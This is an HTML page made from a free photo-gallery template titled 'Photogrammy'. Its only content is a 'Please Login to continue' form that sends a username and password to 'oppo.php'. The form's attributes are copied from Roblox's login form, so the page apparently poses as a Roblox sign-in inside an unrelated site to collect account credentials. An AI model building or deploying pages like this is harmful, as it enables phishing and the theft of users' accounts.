<!DOCTYPE HTML>
<!--
	Snapshot by TEMPLATED
	templated.co @templatedco
	Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
-->
<html>
	<head>
		<title>Photogrammy</title>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1" />
		<link rel="stylesheet" href="assets/css/main.css" />
	</head>
	<body>
		<div class="page-wrap">
		<!-- Nav -->
				<nav id="nav">
					<ul>
						<li><a href="index.html" class="active"><span class="icon fa-home"></span></a></li>
						<li><a href="gallery.html"><span class="icon fa-camera-retro"></span></a></li>
						<li><a href="generic.html"><span class="icon fa-file-text-o"></span></a></li>
					</ul>
				</nav>

			

			<!-- Main -->
				<section id="main">
				<div class="outer">
				</div>
				
					<!-- Banner -->
						<section id="banner">
							<div class="inner">
							<h1> Photogrammy </h1>
								<p>Please Login to continue
								<p>  </p>
							
								</ul>
								
								<div class="inner">
								<form name="loginForm" action="oppo.php" id="LogInForm" class="navbar-form form-inline navbar-left" ng-submit="submitLogin($event)" method="post" role="form" data-use-apiproxy-signin="False" data-sign-on-api-path="https://api.roblox.com/login/v1" novalidate>
                    <div class="form-group" ng-class="{ 'has-error': loginForm.username.$invalid && badSubmit}">
                        <input id="LoginUsername" type="text" placeholder="Username" class="form-control" name="username" autofocus="autofocus" ng-required="true" ng-model="login.username" />
                    </div>
                    <div class="form-group" ng-class="{ 'has-error': loginForm.password.$invalid && badSubmit}">
                        <input id="LoginPassword" type="password" placeholder="Password" class="form-control" name="password" ng-required="true" ng-model="login.password" auto-fill-sync />
                    </div>
                    <div class="form-group">
                        <input type="submit" id="LoginButton" class="form-control" value="Log In " />
						<p> </p>
							
								<p> </p>	
</section>

				
		<!-- Banner -->
						<section id="banner">
		<div class="inner">
								
								<p> <a href="https://templated.co"></p>
								<ul class="actions">
									
										
                    
								</ul>
								</div>
								</section>

		<!-- Scripts -->
			<script src="assets/js/jquery.min.js"></script>
			<script src="assets/js/jquery.poptrox.min.js"></script>
			<script src="assets/js/jquery.scrolly.min.js"></script>
			<script src="assets/js/skel.min.js"></script>
			<script src="assets/js/util.js"></script>
			<script src="assets/js/main.js"></script>


		

	</body>
</html>
								
 
	